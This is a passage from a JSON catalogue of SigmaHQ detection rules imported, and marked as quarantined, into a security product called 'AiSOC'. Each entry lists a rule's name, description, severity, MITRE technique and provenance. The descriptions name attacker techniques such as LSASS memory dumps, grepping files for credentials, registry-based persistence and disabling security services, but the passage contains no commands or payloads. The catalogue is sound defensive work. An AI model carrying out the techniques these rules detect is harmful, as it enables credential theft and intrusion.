\"ksetup.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-password-change-via-ksetup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de16d92c-c446-4d53-8938-10aeef41c8b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" } }, { "id": "sigmahq-sigma-de25eeb8-3655-4643-ac3a-b662d3f26b6b", "type": "detection", "name": "Disable Or Stop Services", "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services on Linux systems.\nAttackers may stop or disable security tools and services to evade detection, maintain persistence, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-or-stop-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" } }, { "id": "sigmahq-sigma-de41232e-12e8-49fa-86bc-c05c7e722df9", "type": "detection", "name": "Suspicious PowerShell Download - PoshModule", "description": "Detects suspicious PowerShell download command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-download-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" } }, { "id": "sigmahq-sigma-de46c52b-0bf8-4936-a327-aace94f94ac6", "type": "detection", "name": "Process Explorer Driver Creation By Non-Sysinternals Binary", "description": "Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\nHack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-explorer-driver-creation-by-non-sysinternals-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de46c52b-0bf8-4936-a327-aace94f94ac6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml" } }, { "id": "sigmahq-sigma-de587dce-915e-4218-aac4-835ca6af6f70", "type": "detection", "name": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-attempt-via-run-keys-using-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de587dce-915e-4218-aac4-835ca6af6f70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" } }, { "id": "sigmahq-sigma-de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "type": "detection", "name": "PAExec Service Installation", "description": "Detects PAExec service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/paexec-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml" } }, { "id": "sigmahq-sigma-deb9b646-a508-44ee-b7c9-d8965921c6b6", "type": "detection", "name": "Powershell Token Obfuscation - Process Creation", "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-token-obfuscation-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml" } }, { "id": "sigmahq-sigma-ded2b07a-d12f-4284-9b76-653e37b6c8b0", "type": "detection", "name": "Potentially Suspicious Ping/Copy Command Combination", "description": "Detects uncommon and potentially suspicious one-liner command containing both \"ping\" and \"copy\" at the same time, which is usually used by malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-ping-copy-command-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ded2b07a-d12f-4284-9b76-653e37b6c8b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml" } }, { "id": "sigmahq-sigma-dee0a7a3-f200-4112-a99b-952196d81e42", "type": "detection", "name": "DumpMinitool Execution", "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumpminitool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dee0a7a3-f200-4112-a99b-952196d81e42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" } }, { "id": "sigmahq-sigma-dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "type": "detection", "name": "Disabled Volume Snapshots", "description": "Detects commands that temporarily turn off Volume Snapshots", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-volume-snapshots.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml" } }, { "id": "sigmahq-sigma-def8b624-e08f-4ae1-8612-1ba21190da6b", "type": "detection", "name": "Outgoing Logon with New Credentials", "description": "Detects logon events that specify new credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outgoing-logon-with-new-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "def8b624-e08f-4ae1-8612-1ba21190da6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml" } }, { "id": "sigmahq-sigma-df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "type": "detection", "name": "Node Process Executions", "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/node-process-executions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml" } }, { "id": "sigmahq-sigma-df3fcaea-2715-4214-99c5-0056ea59eb35", "type": "detection", "name": "Credentials In Files - Linux", "description": "Detecting attempts to extract passwords with grep", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credentials-in-files-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df3fcaea-2715-4214-99c5-0056ea59eb35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_find_cred_in_files.yml" } }, { "id": "sigmahq-sigma-df4dc653-1029-47ba-8231-3c44238cc0ae", "type": "detection", "name": "Potential Persistence Using DebugPath", "description": "Detects potential persistence using Appx DebugPath", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-using-debugpath.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df4dc653-1029-47ba-8231-3c44238cc0ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" } }, { "id": "sigmahq-sigma-df55196f-f105-44d3-a675-e9dfb6cc2f2b", "type": "detection", "name": "Renamed AdFind Execution", "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1087.002", "T1482", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-adfind-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_adfind.yml" } }, { "id": "sigmahq-sigma-df68f791-ad95-447f-a271-640a0dab9cf8", "type": "detection", "name": "DNS Query Request To OneLaunch Update Service", "description": "Detects DNS query requests to \"update.onelaunch.com\". This domain is associated with the OneLaunch adware application.\nWhen the OneLaunch application is installed it will attempt to get updates from this domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1056" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-request-to-onelaunch-update-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df68f791-ad95-447f-a271-640a0dab9cf8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml" } }, { "id": "sigmahq-sigma-df69cb1d-b891-4cd9-90c7-d617d90100ce", "type": "detection", "name": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-frombase64string-usage-on-gzip-archive-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" } }, { "id": "sigmahq-sigma-df6ecb8b-7822-4f4b-b412-08f524b4576c", "type": "detection", "name": "Creation Of Non-Existent System DLL", "description": "Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.\nPhantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.\nThus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-non-existent-system-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" } }, { "id": "sigmahq-sigma-df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "type": "detection", "name": "Suspicious Non PowerShell WSMAN COM Provider", "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-non-powershell-wsman-com-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" } }, { "id": "sigmahq-sigma-dfa03a09-8b92-4d83-8e74-f72839b1c407", "type": "detection", "name": "Potentially Suspicious Child Processes Spawned by ConHost", "description": "Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-processes-spawned-by-conhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfa03a09-8b92-4d83-8e74-f72839b1c407", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml" } }, { "id": "sigmahq-sigma-dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "type": "detection", "name": "Potential Persistence Via Shim Database Modification", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-shim-database-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml" } }, { "id": "sigmahq-sigma-dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "type": "detection", "name": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-hotfix-updates-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml" } }, { "id": "sigmahq-sigma-dfe8b941-4e54-4242-b674-6b613d521962", "type": "detection", "name": "Startup Item File Created - MacOS", "description": "Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.\nAdversaries may use startup items automatically executed at boot initialization to establish persistence.\nStartup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1037.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/startup-item-file-created-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfe8b941-4e54-4242-b674-6b613d521962", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/file_event/file_event_macos_susp_startup_item_created.yml" } }, { "id": "sigmahq-sigma-dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", "type": "detection", "name": "Shell Process Spawned by Java.EXE", "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-process-spawned-by-java-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml" } }, { "id": "sigmahq-sigma-e01fa958-6893-41d4-ae03-182477c5e77d", "type": "detection", "name": "Remote Access Tool - RURAT Execution From Unusual Location", "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-rurat-execution-from-unusual-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e01fa958-6893-41d4-ae03-182477c5e77d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml" } }, { "id": "sigmahq-sigma-e021bbb5-407f-41f5-9dc9-1864c45a7a51", "type": "detection", "name": "Deployment Of The AppX Package Was Blocked By The Policy", "description": "Detects an appx package deployment that was blocked by the local computer policy.\nThe following events indicate that an AppX package deployment was blocked by a policy:\n- Event ID 441: The package deployment operation is blocked by the \"Allow deployment operations in special profiles\" policy\n- Event ID 442: Deployments to non-system volumes are blocked by the \"Disable deployment of Windows Store apps to non-system volumes\" policy.\"\n- Event ID 453: Package blocked by a platform policy.\n- Event ID 454: Package blocked by a platform policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deployment-of-the-appx-package-was-blocked-by-the-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml" } }, { "id": "sigmahq-sigma-e032f5bc-4563-4096-ae3b-064bab588685", "type": "detection", "name": "Potential Local File Read Vulnerability In JVM Based Application", "description": "Detects potential local file read vulnerability in JVM based apps.\nIf the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-local-file-read-vulnerability-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e032f5bc-4563-4096-ae3b-064bab588685", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_local_file_read.yml" } }, { "id": "sigmahq-sigma-e043f529-8514-4205-8ab0-7f7d2927b400", "type": "detection", "name": "DNS Query To AzureWebsites.NET By Non-Browser Process", "description": "Detects a DNS query by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-azurewebsites-net-by-non-browser-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e043f529-8514-4205-8ab0-7f7d2927b400", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml" } }, { "id": "sigmahq-sigma-e0565f5d-d420-4e02-8a68-ac00d864f9cf", "type": "detection", "name": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/automated-collection-bookmarks-using-get-childitem-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" } }, { "id": "sigmahq-sigma-e074832a-eada-4fd7-94a1-10642b130e16", "type": "detection", "name": "HackTool - SafetyKatz Dump Indicator", "description": "Detects default lsass dump filename generated by SafetyKatz.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-safetykatz-dump-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e074832a-eada-4fd7-94a1-10642b130e16", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml" } }, { "id": "sigmahq-sigma-e0813366-0407-449a-9869-a2db1119dc41", "type": "detection", "name": 